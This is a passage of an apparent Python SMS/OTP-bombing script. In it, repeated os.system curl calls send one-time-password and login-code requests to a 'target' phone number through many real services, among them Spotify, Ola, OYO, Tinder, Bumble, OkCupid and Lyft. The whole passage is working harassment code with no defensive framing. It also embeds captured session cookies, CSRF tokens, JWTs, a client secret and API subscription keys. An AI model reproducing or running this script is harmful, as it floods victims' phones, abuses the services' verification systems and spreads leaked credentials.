curl 'https://tikona-expresswifi-com.tikona.in.expresswifi.com/customer/login/?ref=landing_view_next_clicked&country_code=IN&refid=8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://tikona-expresswifi-com.tikona.in.expresswifi.com/' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: datr=lbe2X3ZshI_n0mT0Q0jLnBoC; wd=1366x541' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'lsd=AVpLs-VOVTM&jazoest=2911&raw_customer_mobile_number='''+target+'''&processed_customer_mobile_number='''+target+'''&pin_notif_medium=&is_tokenized_mobile_number_invalid=false&js_check=js_check_passed' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.oyorooms.com/api/pwa/generateotp?locale=en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.oyorooms.com/login?country=&retUrl=/' -H 'XSRF-TOKEN: dKkEqcG0-lsyZi2T6_8SIrxwoUTnOy1qanY4' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: https://www.oyorooms.com' -H 'Connection: keep-alive' -H 'Cookie: _csrf=wpaVZvtR40diSsIuZbF5gVqA; acc=IN; X-Location=georegion%3D104%2Ccountry_code%3DIN%2Cregion_code%3DGJ%2Ccity%3DAHMEDABAD%2Clat%3D23.03%2Clong%3D72.62%2Ctimezone%3DGMT%2B5.50%2Ccontinent%3DAS%2Cthroughput%3Dvhigh%2Cbw%3D5000%2Casnum%3D45916%2Clocation_id%3D0; mab=4960a9378eff91b90107f54bc9084e1b; expd=mww2%3A1%7CBnTc%3A0%7Cnear%3A0%7Cioab%3A1%7Cmhdp%3A1%7Cbcrp%3A1%7Cpwbs%3A1%7Cmwsb%3A0%7Cslin%3A1%7Chsdm%3A0%7Clpex%3A1%7Clphv%3A0%7Cdpcv%3A0%7Cgmab%3A0%7Curhe%3A0%7Cprdp%3A1%7Ccomp%3A0%7Csldw%3A1%7Cmdab%3A0%7Cnrmp%3A1%7Cnhyw%3A1%7Cwboi%3A1%7Csst%3A1%7Ctxwb%3A1%7Cpod2%3A1%7Clnhd%3A1%7Cppsi%3A0%7Cgcer%3A0%7Crecs%3A1%7Cgmbr%3A0%7Cyolo%3A1%7Crcta%3A0; appData=%7B%22userData%22%3A%7B%22isLoggedIn%22%3Afalse%7D%7D; token=dUxaRnA5NWJyWFlQYkpQNnEtemo6bzdvX01KLUNFbnRyS3hfdEgyLUE%3D; _uid=Not%20logged%20in; XSRF-TOKEN=dKkEqcG0-lsyZi2T6_8SIrxwoUTnOy1qanY4; ak_bmsc=F1B2E3F36EAD2FF4FD5308B628F6FF73312C8CACA15C0000FC5FB75F297D6274~pleE7MFZIyrbPoGtCLbQihpkmLZeoWIVJDqX3JotgCKRsrPKNNS0NcVh93CT0m5EAEzreK025SmSVEtb5amEFAVCQCnrT4FLlZiOFYDnlciOxBxfEi/NSdQm0z4+eodnznc0Nq9mAj8XtjTb6h9EOlouxSmtg1/pC1sDaMJjJIqJw2UTfiz2EH251w/iGv79xs+1HaAVIPqKyI0sbz8fNq9/+a9QFiaQCu4mDc5rJbDGSiev8klA9PZp1Kqgqp9Clg; bm_sv=08C795B730BF8AF6BC867D9C3D8C9B9F~1gO1Fw847iTM/sJ8D17FF4+By/VzI2r3QySU63DyaFqGCqqF2UG3JUVDwwKgzJIY3yWZmW8gMexvqvhOlb6RTetcoNf9bFsifm2qreXy1abdEknXsU8Doev+4uBoBd9Rk5BDYYxPDQi0HnrY8571zgtXEQlMJ4Opknf61pKlaIE=; AMP_TOKEN=%24NOT_FOUND; fingerprint2=da540609af0a0473dca22afd95783b45; _ga=GA1.2.846289981.1605853243; _gid=GA1.2.1821614385.1605853243; 
_gcl_au=1.1.833385247.1605853244; tvc_utm_source=google; tvc_utm_medium=organic; tvc_utm_campaign=(not set); tvc_utm_key=(not set); tvc_utm_content=(not set); _uetsid=85e7f7e02af811eba53de3e48aa3fff5; _uetvid=85e96ba02af811eb899477482b721ac6; moe_uuid=58cae2cf-8df9-43dc-8088-6f91e9758626; cto_bundle=kBKOtl9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzekFPUGVnTm0lMkZyU0N6WDlaSFJOOVk3V0xjJTJCaGdDJTJGNUhMSVBzOUQ0dXg0a2FjdURxaVFOdVpycUVyZ0ZQYklxbG5lbTRZNTFlTVdrME9mRnIzd29VM1pONTY0ek5HJTJGd2l6RVpHcG81VnI0c2NzaHkwcWtpRnJmJTJCbGRxd3VBJTJGb0daNkgxSTJpS210NWZDWDclMkJLNE01ekFqNVA4dzZHRnhRQ1RaQVdGaVNUV0ky; _fbp=fb.1.1605853249274.1421681914; outbrain_cid_fetch=true; _gat=1' --data-raw '{"phone":"'''+target+'''","country_code":"+91","nod":4}' > /dev/null 2>&1
''')
os.system('''
curl 'https://drive.olacabs.com/oauth/api/v2/web/auth/preauth' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://drive.olacabs.com/otp' -H 'Content-Type: application/json' -H 'x-request-key: 0c19d4b1-1618-29a1-ba9e-92f58b2652ad' -H 'x-fp-key: 8166d0dd-04b9-07a6-3636-73d53ca70515' -H 'x-application-license-key: d6ba8ca2d23c4f2aabace889d1d9a973' -H 'Connection: keep-alive' -H 'Cookie: _gcl_au=1.1.1320744897.1605855276; G_ENABLED_IDPS=google; _ga=GA1.2.589847508.1605855277; _gid=GA1.2.637545922.1605855277; _fbp=fb.1.1605855277256.1820893570; X-Access-token=eyJhbGciOiJIUzI1NiJ9.eyJ0dCI6IlBUIiwiaWJ5IjoiaHR0cHM6Ly9zdXBwbHktYXBpLm9sYWNhYnMuY29tIiwiYWJhIjpmYWxzZSwidHYiOiJ3dHYyIiwiaXBsIjpmYWxzZSwiY2xpZW50VG9rZW4iOmZhbHNlLCJkZXZpY2VGaW5nZXJQcmludCI6ImJtSUsxZTlNOEdOMERSQkZIS0xJMW1lN0JFVFlhOU55N2dRMmc4SjNjdHNsVFFkVi9OZDE4eWZldlh1WEdwTmZRZHYwbk5nWVlsc05nSVo5bURMOUh3PT0iLCJibGFja0xpc3RlZCI6ZmFsc2UsInRva2Vua2V5IjoiNWE2NjJhZmMtZTZmOS00YmZjLTkyNDMtN2YxMzk3NWYwN2M1IiwiZGVsZXRlZCI6ZmFsc2UsImFwcGxpY2F0aW9uTGljZW5zZUtleSI6ImQ2YmE4Y2EyZDIzYzRmMmFhYmFjZTg4OWQxZDlhOTczIiwicHJvdmlkZXIiOiJJTVNTdXZpZGhhQXV0aCIsImxpY2Vuc2VWZXJzaW9uIjoxMDAxLCJhdXRoX3NjaGVtZSI6Ik9UUCIsImV4cGlyeSI6MTYwNTg1NTg4ODEwNywiaWF0IjoxNjA1ODU1Mjg4MTA3fQ.NKB_7-L_-T3BBcyAi3s_aot-85Dhi140KKSg9EQewN0; _gat_UA-151183718-1=1; _gat_UA-20199135-16=1' -H 'TE: Trailers' --data-raw '{"auth_scheme":"OTP","provider":"IMSSuvidhaAuth","credential":{"idToken":"","dialingCode":"+91","mobileNumber":"'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://accounts.spotify.com/login/phone/code/request' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://accounts.spotify.com/en/login/phone?continue=https:%2F%2Faccounts.spotify.com%2Fen%2Fstatus' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: __Host-device_id=AQBagpNYapOFsSYmwBOFWYFlp5wmn9_goFdJdshoSBmPW9JF-6GyFT9s2ol4awPJ9oxgIKupgji5F9JF1RIxmVk73Jg7bn0nQBY; __Secure-TPASESSION=AQDoNfGggr46/8s+Iy+hth6s6faFYscDJSuFrVVnQciVoszMxjyPJZMfFoosmAZ24281f0firVil0qbSQqP8/9nTmiTY5CVEUMo=; csrf_token=AQB4RBQMuhhLP5FRikp6sZKAfacvsSVf0NeUxiqNWTHTCLYFs4jD2eRsonexMVLQE6kqELxRaUZ0VwOlvA; __bon=MHwwfDYyNzE2MjM5MHwyNjM0MDgyMDM4MHwxfDF8MXwx; remember=1; _ga=GA1.2.1997859450.1605856440; _gid=GA1.2.858075890.1605856440; _gat=1' -H 'TE: Trailers' --data-raw 'phonenumber=%2B91'''+target+'''&csrf_token=AQB4RBQMuhhLP5FRikp6sZKAfacvsSVf0NeUxiqNWTHTCLYFs4jD2eRsonexMVLQE6kqELxRaUZ0VwOlvA' > /dev/null 2>&1
''')
os.system('''
curl 'https://accounts.croma.com/api/v1/sso/login/phone-otp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://accounts.croma.com/phone-otp?clientId=CROMA-WEB-APP&redirectURL=https%3A%2F%2Fwww.croma.com%2Fvalidate-sso-token%2F%3FredirectUrl%3Dhttps%3A%2F%2Fwww.croma.com' -H 'Content-Type: application/json;charset=utf-8' -H 'client_id: CROMA-WEB-APP' -H 'client_secret: 93aa47c8-05d5-47fd-b484-5de663b3a3dd' -H 'Access-Control-Allow-Origin: https://api.tatadigital.com' -H 'Ocp-Apim-Subscription-Key: 354d9be9edce479fbd797edc71ebf50b' -H 'Ocp-Apim-Trace: true' -H 'Connection: keep-alive' -H 'Cookie: _dy_ses_load_seq=34597%3A1605857296267; _dy_csc_ses=t; _dy_c_exps=; _dy_soct=508122.944897.1605857296; AMCV_E78F53F05EFEF21E0A495E58%40AdobeOrg=359503849%7CMCIDTS%7C18587%7CvVersion%7C5.0.1; AKA_A2=A; SESSION=MmY5YjY3NzUtMDFhNy00NmRhLTgxMjgtNzc1NDFlZDhlODI0; RT="z=1&dm=croma.com&si=yyxgdo1sx9&ss=khpxz140&sl=0&tt=0"; AMCV_EE3B6AAD5E1ED5570A495FA0%40AdobeOrg=-408604571%7CMCIDTS%7C18587%7CMCMID%7C55093355428516333280615618269338090932%7CMCAAMLH-1606462101%7C12%7CMCAAMB-1606462101%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605864501s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C4.6.0; mbox=session#a6f07114ea0b4e059e0407da5737386e#1605859161|PC#a6f07114ea0b4e059e0407da5737386e.31_0#1669102135; AMCVS_EE3B6AAD5E1ED5570A495FA0%40AdobeOrg=1; at_check=true; s_plt=8.82; s_pltp=%5B%5BB%5D%5D; s_vnc365=1637393303239%26vn%3D1; s_ivc=true; s_dur=1605857303244; s_tslv=1605857332374; s_ppv=https%253A%2F%2Faccounts.croma.com%2Fphone-otp%253FclientId%253DCROMA-WEB-APP%2526redirectURL%253Dhttps%25253A%25252F%25252Fwww.croma.com%25252Fvalidate-sso-token%25252F%25253FredirectUrl%25253Dhttps%25253A%25252F%25252Fwww.croma.com%2C100%2C100%2C541%2C1%2C1; s_ips=541; s_tp=541; s_cc=true; 
s_sq=tatadigitalproduction%3D%2526c.%2526a.%2526activitymap.%2526page%253Dhttps%25253A%25252F%25252Faccounts.croma.com%25252Fphone-otp%25253FclientId%25253DCROMA-WEB-APP%252526redirectURL%25253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2525252Fvalidate-sso-token%2525252F%2525253FredirectUrl%2525253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2526link%253DConfirm%2526region%253Dapp%2526.activitymap%2526.a%2526.c%2526pid%253Dhttps%25253A%25252F%25252Faccounts.croma.com%25252Fphone-otp%25253FclientId%25253DCROMA-WEB-APP%252526redirectURL%25253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2525252Fvalidate-sso-token%2525252F%2525253FredirectUrl%2525253Dhttps%2525253A%2525252F%2525252Fwww.croma.com%2526oid%253DSubmit%2526oidt%253D3%2526ot%253DSUBMIT' -H 'TE: Trailers' --data-raw '{"countryCode":"91","phone":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.bigbasket.com/mapi/v4.0.0/member-svc/otp/send/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.bigbasket.com/auth/login/' -H 'Content-Type: application/json' -H 'X-CSRFToken: 96kahOxAdlUzDGHh8EpbmaTR7syxZMnZQfnIm5st3ojXLBSxAImGurxqspds5cML' -H 'X-Channel: BB-WEB' -H 'X-Caller: DVAR-SVC' -H 'Origin: https://www.bigbasket.com' -H 'Connection: keep-alive' -H 'Cookie: _bb_cid=1; _bb_aid="MzAwNDkxOTI2MA=="; _bb_locSrc=default; ts="2020-11-20 13:12:50.255"; _bb_ftvid="MzY4MzM3MTE2MQ==|dgoLTkMCAE4rCkZVUFJRABBTXF8ESVhQUhB3LjE="; _bb_hid=1723; _bb_vid="MzY4MzM3MTE2MQ=="; _bb_tc=0; _client_version=2346; _bb_rdt="MzE1MjY0NTY0OQ==.0"; _bb_rd=6; _sp_van_encom_hid=1722; _sp_bike_hid=1720; sessionid=d6f764m71ykhzgx6cegwezceq52v7e5o; csrftoken=96kahOxAdlUzDGHh8EpbmaTR7syxZMnZQfnIm5st3ojXLBSxAImGurxqspds5cML; bigbasket.com=8250e4f4-2770-4dd2-877a-d85898863f09; _ga=GA1.2.2046045764.1605858142; _gid=GA1.2.1185598527.1605858142; adb=0; _gcl_au=1.1.605561576.1605858156; _fbp=fb.1.1605858156460.1577717186; G_ENABLED_IDPS=google' --data-raw '{"identifier":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://secure.yatra.com/social/common/yatra/sendMobileOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://secure.yatra.com/social/common/yatra/signin.htm?returnUrl=https%3A%2F%2Fcoupons.yatra.com%2Fcoupons%2Fcoupons' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: JSESSIONID=CAD6EDDFD722B0F5B18E0C5A483C444D; ak_bmsc=9689D8FBBBE6F8B8E0AFC3D282540E1A687C3626122B00002875B75FB9590E32~plQDz7HnlsEyxa0im/g5FNLbC99hsc0o703nsekr8QOIWIGRfkOdzPaA32fdQ175uNYMGytOdfSsqO7h7hOpy/uMgnAHAidE8F7tPw4UpSC/yxZl0GvjuTgZVFnhVSWXol+6xeUdUgglJVCoey6PCcnIWVw4BzmniOyERYqUvyIzmyV1SEfS56aAEJ47MB5EfPXvZBQcBNWbOaIj1uw7rNuMIsEK4wnq8xcxpyVkOHXloAFbAGHZUCqLI8dev4qJAp; bm_sz=CC87061EE645067189F92F114F966008~YAAQJjZ8aMvQ7sd1AQAAsqeh5Akq7teFdAOnJHVk8/4Mc4JCAfgWbJpR8AZzk0rQ8rDMeDU88H9Uoh9CRbjRsHngOf98QOBD3b9XDxdnvnl7cOzV/0RCCQnF+T0M4yTxhZeJ1Ca/iM3ifN9VU7R1KmXWwY43Res3bV6PlDGFp/cnM3UZ4d+IlrK7yuw2Py8=; _abck=9ABE9B02B4CA41C61350A940FD077867~0~YAAQJjZ8aG7R7sd1AQAAaNmh5ARwT7ffQjyaiGv1tfvp/HHqrunQnyXa6ouUoDwrnyeQPHc103qCI+PP7BuOw9putCxkHTsVp+38AD2P5gV2lDa16rDoFZOzDuG6rdrbB9vKbUCdGHovXzR2mdiHJER05CSAv77KzTGoaOgE/YsIcgPu2Bq92p/Home/hieD4GzTJD8KJyPKfL6bAEk5LDXADLlSmwBEWyMpHz3vT5IcknFHNy4EylV9IrXHYuVLU5cFq32e4rVsdl5QM4z6g1bdK+JD+NDFDBkIUczrEF3sXTLWS1/TRRDQv5JmhScTALuNozzpNjnswSyK8M97s3pzcay1~-1~||-1||~-1; ak_time=1605858603; G_ENABLED_IDPS=google; __utma=39525803.1472901679.1605858658.1605858658.1605858658.1; __utmb=39525803.1.10.1605858658; __utmc=39525803; __utmz=39525803.1605858658.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; RT="z=1&dm=yatra.com&si=a09337a6-dcc6-4749-9cd0-dc8e7860cb25&ss=khpys0rc&sl=1&tt=dy0&bcn=%2F%2F684d0d3b.akstat.io%2F&ld=esw"; __utmli=login-continue-btn; 
bm_sv=D0D21B7B62167946C060923A67B453EA~BY/d8k1FFmk6N2ZMCcTgFTz92w3KEIGBPCzgkRNtltVgbXSr3xPWb4ZRp4ZohRVTOoG49usPR0AVpQx3rcPGMu4aFoj328ymf89s55U/TIfG4EcfwdICzTmMD8xr0vtlBnUaxmQtgl0KRmmL302Q6pfyXl6phoWkEfBoNIISBgw=' -H 'TE: Trailers' --data-raw 'isdCode=91&mobileNumber='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://flightservice.easemytrip.com/EmtAppService/UserRagister/UserRagistrationEmailMob' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/plain, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.easemytrip.com/' -H 'Content-Type: application/json; charset=utf-8' -H 'Origin: https://www.easemytrip.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw $'{\'_email\':\''''+target+'''\',\'refereeCode\':\'\',\'refereeURL\':\'\'}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.justdial.com/functions/whatsappverification.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.justdial.com/Login' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-FRSC-Token: e88493df92f753f01ce9d3ca1c04424bb5a5898dbaa4d4060b9ef03260127f45' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=c63b6bd7433107b95879e30b4f57e723; TKY=e88493df92f753f01ce9d3ca1c04424bb5a5898dbaa4d4060b9ef03260127f45; _ctok=7d731c98975675d40b96e37f7c0f1cc0ab4e9ef92858ccd20b8fbba9d351ca07; main_city=Ahmedabad; attn_user=logout; ppc=/Login; ak_bmsc=1CA1E70C1D80BCF7436B14A514B1074C312C8CB5D6380000E285B75F5B9FF64F~plPgtyMsnWf2K3t/AX1dlqKR6ThIFCzZ8W+j3W0Yf8bDijjF3/clBfn4K83adDtqh8vJaF6EVVpv1EGj8nh2UrBnK4DRHJpYQDlH4g+PNR8VfegWAJJ3CzqHZsLyqHToXNYkkq6E1EQcaNFCEUsBba10auYz33lm+HuCKotUdkCfQBNjLOFj0BZinpTmtVXczSqKN3X2Gop1jBmwGKzuuRdUQLJlXIak/C5lPHE3e/1vOWNMA5z5mZMN8MCS10Kgs9; bm_sz=CC39C016A66631B8D86537A2E873FF0B~YAAQtYwsMfteW3d1AQAAlf7i5AlvS+cCoHYD11pkYw9iX6+v6RrN/pyca0Dk1p66vAk/QVRIv2NTCE75kEKPQlbCNrNCW39ihJ0bGmA9F4iuTZlzKpvVeLMo5W9+sr+ApyxqcPvc5AOgAg03EMd7inQes5zBEjPPSXC8C4rKcsxbM2juxBoskr1W+JKG8OsgMlg=; _abck=3861570E7476E36C640BD7E62074C48D~0~YAAQtYwsMQlfW3d1AQAATBDj5ARW7MfRfB7NDgYQGdGRlQDbYiPtczvhRlJcrGUqQPyNCjP6HOCDWBskynCPgYiMTR3RWqIgjznOKZK9Ahy+9zanNfOhSsKLUj0Sz1NF1NCljlQtinhqQHSAdjeiKSsVvtBPAKQX2zAa2m6uuUAn4Fikd4IQyUoZeKI02cjw7U1zzivI8mqCR4P5pic4DaSXe+702cum1N3GfZ/QsKJc/qp9fxXdaKChholQVIDHTHw2zQr2294wg0Fbdxw9jtUWWehQM9QcGFw35wCMoTqUMOuN6RV66MZD/FkNUckkbTSzJtBNPUkQLdOB/7x3hL/Z0GjQdpin~-1~||-1||~-1; _ga=GA1.2.1267073874.1605862936; _gid=GA1.2.738153487.1605862936; _gat=1; _gat_UA-31027791-3=1; _fbp=fb.1.1605862936074.1822559334; 
bm_sv=D9F5F940C3F47286707A6FB54F21B655~1lNr5Ve2q6QWLGNvR9l9++cXfUuGv7X//w9/q1NlhYDTU+bs2J5TVLuhzzCKX4RkQbt0Z3odGZJHeWL2yws3/iIoogXu5DfeDVrgXvbGqfR4LSCisdWkqC/KSPaQ/ChC/9HOQKhsfXIKN/stXzrteW8gTuBXZpb+LbNWOakoo1s=; scity=Ahmedabad; usrcity=Ahmedabad; inweb_city=Ahmedabad; dealBackCity=Ahmedabad' -H 'TE: Trailers' --data-raw 'mob='''+target+'''&vcode=&rsend=0&name=kkk' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.gotinder.com/v3/auth/login?locale=en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://tinder.com/' -H 'app-session-id: b7a2ea4d-0375-4367-9659-59f6e06bf1cf' -H 'app-session-time-elapsed: 186483' -H 'app-version: 1026300' -H 'persistent-device-id: 614d68bc-02dc-4efd-b101-d045996667be' -H 'tinder-version: 2.63.0' -H 'user-session-id: null' -H 'user-session-time-elapsed: null' -H 'x-supported-image-formats: jpeg' -H 'platform: web' -H 'Content-Type: application/x-google-protobuf' -H 'funnel-session-id: 5ba1786023bc3fbf' -H 'Origin: https://tinder.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw $'\n\x0e\n\x0c91'''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://lapinozpizza.in/client/login/'''+target+'''/5' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://lapinozpizza.in/order/lapinoz-bodakdev-ahmedabad' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=3v2gk9j90j5i9hk062l31pdevo; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225c0ba0d10ebdd067f127a3c9e17df96a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22103.249.233.70%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A68.0%29+Gecko%2F20100101+Firefox%2F68.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1605866048%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D97e2b9b476bcba7be1cf42a9d16947d1; _ga=GA1.2.906933160.1605866104; _gid=GA1.2.1131025764.1605866104; _gat_gtag_UA_122849002_3=1; _fbp=fb.1.1605866104971.637099755' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.okcupid.com/graphql' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.okcupid.com/login' -H 'content-type: application/json' -H 'x-okcupid-platform: DESKTOP' -H 'x-okcupid-version: 1' -H 'Origin: https://www.okcupid.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=dfa43d8401b0fed2c47b51c632c5e0b471605866437; siftsession=15493059844142823704; secure_login=1; secure_check=1; guest=2002666923403036682; ua=531227642bc86f3b5fd7103a0c0b4fd6; __ssid=59b86baca6547b01cc9992b10802c65; ab.storage.sessionId.719f8d59-40d7-4abf-b9c3-fa4bf5b7cf54=%7B%22g%22%3A%2272dbce82-10c4-713a-5bb1-e402e787b171%22%2C%22e%22%3A1605868311668%2C%22c%22%3A1605866505179%2C%22l%22%3A1605866511668%7D; ab.storage.deviceId.719f8d59-40d7-4abf-b9c3-fa4bf5b7cf54=%7B%22g%22%3A%228b634f6e-4c32-79a4-e819-044ca72fbd68%22%2C%22c%22%3A1605866505189%2C%22l%22%3A1605866505189%7D; OptanonConsent=isIABGlobal=false&datestamp=Fri+Nov+20+2020+15%3A31%3A49+GMT%2B0530+(GMT%2B05%3A30)&version=6.6.0&hosts=&consentId=3fde33bc-3d3e-4a1c-9ff5-1890597623aa&interactionCount=1&landingPath=NotLandingPage&groups=1%3A1%2C2%3A1%2C3%3A1%2C4%3A1; OptanonAlertBoxClosed=2020-11-20T10:01:49.190Z; _ga=GA1.2.858792157.1605866511; _gid=GA1.2.755737974.1605866511; _gat=1; kppid_managed=NxkODtGQ' -H 'TE: Trailers' --data-raw '{"operationName":"authOTPSend","variables":{"input":{"tspAccessToken":"eyJhbGciOiJIUzI1NiJ9.eyJpZCI6Ijc2Njg0NTc3MyIsImV4cCI6MTYwNTg2ODI4NiwidW5pcXVlbmVzc19pZCI6IlNCTHlXdVFqNTFKNSJ9.u5f7oqaCJWJeSWKVGOKEMSrRQEWzXOptZUaUr4JxyTY","phoneNumber":"91'''+target+'''","platform":"web"}},"query":"mutation authOTPSend($input: AuthOTPSendInput!) {\n authOTPSend(input: $input) {\n success\n statusCode\n __typename\n }\n}\n"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://bumble.com/mwebapi.phtml?SERVER_SUBMIT_PHONE_NUMBER' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://bumble.com/get-started' -H 'Content-Type: json' -H 'x-use-session-cookie: 1' -H 'Connection: keep-alive' -H 'Cookie: session=s1:9999:tceRU9LytKufwZ4zIbcqR2zP5mL1M4TPYE87nxe3; session_cookie_name=session; device_id=9711d8c6-d8c6-c60a-0ae8-e84e96a51b10; buzz_lang_code=en-us; _ga=GA1.2.959078456.1605866855; _gid=GA1.2.1635307871.1605866855; _pin_unauth=dWlkPU4yRTBPRE13WkRJdE16RXdaaTAwTjJZM0xUZ3dOemt0TkRZeU5qZ3dZV0kzWW1GbA; _fbp=fb.1.1605866855634.1658618970; _gat=1; _scid=377c24e1-4f83-4c62-8cb0-dea1bfe18331; _sctr=1|1605810600000; HDR-X-User-id=' --data-raw '{"$gpb":"badoo.bma.BadooMessage","body":[{"message_type":678,"server_submit_phone_number":{"phone_prefix":"+91","screen_context":{"screen":23},"phone":"'''+target+'''","context":203}}],"message_id":10,"message_type":678,"version":1,"is_background":false}' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.lyft.com/v1/phoneauth' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://account.lyft.com/' -H 'Content-Type: application/json;charset=utf-8' -H 'Lyft-Version: 2017-09-18' -H 'x-locale-language: en-US' -H 'Origin: https://account.lyft.com' -H 'Connection: keep-alive' -H 'Cookie: accountAuthXSRFToken=14cbe403-6944-4e7f-8f3b-de7db0f9db9b; sessId=37c998a4-6483-4b48-b56c-cf929a78b8c0L1605867592; _gcl_au=1.1.485351020.1605867647; _ga_LQ1KHS36LD=GS1.1.1605867647.1.1.1605867647.60; _ga=GA1.2.396555731.1605867648; _gid=GA1.2.853807903.1605867648; OptanonConsent=isIABGlobal=false&datestamp=Fri+Nov+20+2020+15%3A50%3A54+GMT%2B0530+(GMT%2B05%3A30)&version=5.13.0&landingPath=NotLandingPage&groups=1%3A1%2C2%3A0%2C3%3A0%2C4%3A0%2C0_231652%3A0%2C0_231650%3A0%2C0_231656%3A0%2C0_231654%3A0%2C0_231660%3A0%2C0_239512%3A0%2C0_231658%3A0%2C0_231664%3A0%2C0_231662%3A0%2C0_231667%3A0%2C0_231644%3A0%2C0_231648%3A0%2C0_231646%3A0%2C0_231653%3A0%2C0_231651%3A0%2C0_231657%3A0%2C0_231655%3A0%2C0_231661%3A0%2C0_231659%3A0%2C0_231665%3A0%2C0_231663%3A0%2C0_231668%3A0%2C0_231666%3A0%2C0_231645%3A0%2C0_231643%3A0%2C0_231649%3A0%2C0_231647%3A0&AwaitingReconsent=false; _gat_UA-1446928-6=1; _dc_gtm_UA-1446928-6=1; _gat_UA-1446928-17=1; _gat_UA-1446928-10=1; lyftAccessToken=bftjCkfCa3Rshf9QlloZhitB3BASjbEn6gZFYSLxN0efiLlq+bogZ7gJDXgzQNZATvjqABEOVscMLrDscSGflbOWzEvwsoOD1uq8dp2PqL8c+zwhpihNRb8=; 